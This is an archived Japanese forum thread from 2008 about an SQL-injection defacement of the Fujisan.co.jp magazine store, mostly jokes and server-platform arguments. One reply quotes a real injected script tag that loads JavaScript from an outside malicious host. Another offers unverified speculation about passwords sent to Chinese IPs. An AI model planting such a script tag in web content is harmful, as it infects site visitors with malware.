【書店】ネット書店「Fujisan」が改ざん被害、閲覧でウイルス感染のおそれ[08/05/13]

このエントリーをはてなブックマークに追加
1やるっきゃ騎士φ ★:2008/05/15(木) 10:32:39 ID:???
富士山マガジンサービスは、同社が運営する雑誌専門のオンライン書店
「Fujisan.co.jp」が不正アクセスにより改ざんされたと発表した。

同社ウェブサイトの脆弱性に対してSQLインジェクション攻撃が行われ、
2008年5月8日8時ごろにウェブサイトの一部が改ざんされたもの。
「www.fujisan.co.jp」のほか、「askul.fujisan.co.jp」
「shop.fujisan.co.jp」などでも被害が発生し、同社では同日11時時過ぎに
ウェブサイトを一時閉鎖した。

改ざんされたページは、不正なスクリプトが埋め込まれており、問題の期間に
ページを閲覧した場合、悪意あるウェブサイトへ誘導され、トロイの木馬
「TROJ_ARTIEF.H」に感染するおそれがあった。
今回の不正アクセスによる個人情報の漏洩は、確認されていないという。

同社では、改ざんされたページを閲覧した可能性がある利用者に対して、
最新の定義ファイルを適用したウイルス対策ソフトにより、
ウイルスのスキャンや駆除を呼びかけている。

ソースは
http://www.security-next.com/008161.html
富士山マガジンサービス
http://www.fujisan.co.jp/
依頼を受けてたてました。
2名刺は切らしておりまして:2008/05/15(木) 10:33:10 ID:cExLx8Lx
Fujisan大爆発の著者どこ?
3名刺は切らしておりまして:2008/05/15(木) 10:34:58 ID:U3I0Lx/c
/^o^\
4名刺は切らしておりまして:2008/05/15(木) 10:36:41 ID:E0gMHXO+


「50万サイト以上の『IIS』サーバーがサイバー攻撃の影響下に」

脆弱性を抱える Microsoft の Web サーバー『Internet Information Services』(IIS) を用いた
Web サイトが、大規模なサイバー攻撃の対象となっている。サイトの訪問者を、
悪質コードのあるサイトにリダイレクトする手口で、被害が急増している。

http://headlines.yahoo.co.jp/hl?a=20080425-00000011-inet-secu



5名刺は切らしておりまして:2008/05/15(木) 10:37:31 ID:knX6hFvD
javaスクリプトは切っておけとあれほど
6名刺は切らしておりまして:2008/05/15(木) 10:37:52 ID:DxlqTv9U
>>3に言いたいこと全部言われた
7名刺は切らしておりまして:2008/05/15(木) 10:38:26 ID:q/2HtXrO
8名刺は切らしておりまして:2008/05/15(木) 10:42:26 ID:tTxOPQqE
フッジサーン禁止
9名刺は切らしておりまして:2008/05/15(木) 10:43:18 ID:dAghEK2w
/´_ゝ`\アッソーサン
10名刺は切らしておりまして:2008/05/15(木) 10:43:57 ID:JTnAVfiH
Windows鯖はやめとけとあれほど
11名刺は切らしておりまして:2008/05/15(木) 10:47:50 ID:Dynmtr5e
>>5
プニルかFF3にしろって事だね



Opera?
価値なし!!!
12名刺は切らしておりまして:2008/05/15(木) 10:48:44 ID:SlHJSXUF
GO WAY ! !<script src=http://www.nihaorr1.com/1.js></script ...
倖田來未 avex network inc.
mu-mo.atmusic.jp/asx.asp?id=RBS0-N0028
13名刺は切らしておりまして:2008/05/15(木) 10:49:29 ID:Ea3KISRd
>>11

プニルは中身がIEだから使いもんにならない
14名刺は切らしておりまして:2008/05/15(木) 10:51:56 ID:pJ5o3HBl
/^o^\フッジッサーン
15名刺は切らしておりまして:2008/05/15(木) 11:21:40 ID:VSPJD5Mi
>>7
2005年からIISだな
LinuxにIISのるとは知らなかった
16名刺は切らしておりまして:2008/05/15(木) 11:22:21 ID:VSPJD5Mi
間違えた2005年からLinux
17名刺は切らしておりまして:2008/05/15(木) 11:34:52 ID:Dj+Yg68s
>>16
大量のトランザクションをWin鯖では捌ききれないので、Web鯖の手前にLinuxの
キャッシュ鯖置いただけだろw
Web鯖自体はWindows 2000上のIIS
18名刺は切らしておりまして:2008/05/15(木) 11:44:25 ID:yYUTWA4p
昼の時間帯なのに激重でまともにログインできんとか
とんでもないサイトだった。
2〜3年前に解約してアカウント削除したけど。
もちろん解約用のページなんかあるはずもなく
メールで連絡させられた。
19名刺は切らしておりまして:2008/05/15(木) 11:46:34 ID:hoTcT2nd
>>18

今どきWindows鯖で商用サイトやってる会社なんてそんなもんだよ。

20名刺は切らしておりまして:2008/05/15(木) 12:04:30 ID:VSPJD5Mi
>>17
やっぱり、そういうことですかw
ググったけど無理そうだったw

さすがにaspのソースを簡単にLinuxには出来ないからおかしいと思って
進んでみたらaspだしw
21名刺は切らしておりまして:2008/05/15(木) 12:15:12 ID:C0nfj2oS
初めて存在知ったよ
22名刺は切らしておりまして:2008/05/15(木) 12:20:49 ID:64GeZmhC
だから糞Windowsを使うな

一番いいのは、Linuxだ!

その次は以外にMacなんだよ
一度代えてみてよ、Macのサーバー管理はWindowsの上を行っている
23名刺は切らしておりまして:2008/05/15(木) 12:52:30 ID:N95HrQj/
/^o^\フッジッサーン♪ フッジッサーン♪ …… … (ゾーサン ノ メロディー デ。)

/^o^\フーンカハヤバイヨネ♪

/^o^\ソーョ フッジッサーンハ ヤーバイノヨー♪




(⌒⌒⌒)
 ||
/^o^\ どっかーん
24名刺は切らしておりまして:2008/05/15(木) 15:02:22 ID:BI3tWYgp
これは最近猛威をふるってる、中国のIPに盗んだパスワードを送るトロイだろ。
一般のPCから中国のIPへのアクセスをまとめて遮断してしまえば確実に防止できるのだが・・・
25名刺は切らしておりまして
アマゾンの仕業?bk1?セブン?